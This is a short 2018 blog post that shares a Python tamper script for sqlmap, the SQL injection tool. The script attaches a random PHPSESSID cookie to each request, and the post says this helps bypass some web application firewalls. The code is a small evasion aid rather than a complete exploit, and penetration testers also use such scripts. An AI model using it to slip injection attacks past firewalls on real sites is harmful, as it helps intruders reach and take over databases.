Thursday, November 8, 2018

Random Session (Sqlmap Tamper)


SQLMAP is Automatic SQL injection and database takeover tool.
this tamper can use to bypass some web application firewall via the random session.

Download script


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/usr/bin/env python
 """
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
author: 3H34N(nezami.me)
"""
import string
import random
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
 def dependencies():
    pass
 def randomsession():
    length = 32
    chars = string.ascii_letters.lower() + string.digits
    password = ''.join(random.choice(chars) for i in range(length))
    return "PHPSESSID="+password
 def tamper(payload, **kwargs):
    """
    Append a random session HTTP header 'PHPSESSID' to bypass
    WAF (usually application based) protection
    """
    headers = kwargs.get("headers", {})
    headers["Cookie"] = randomsession()
    return payload

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)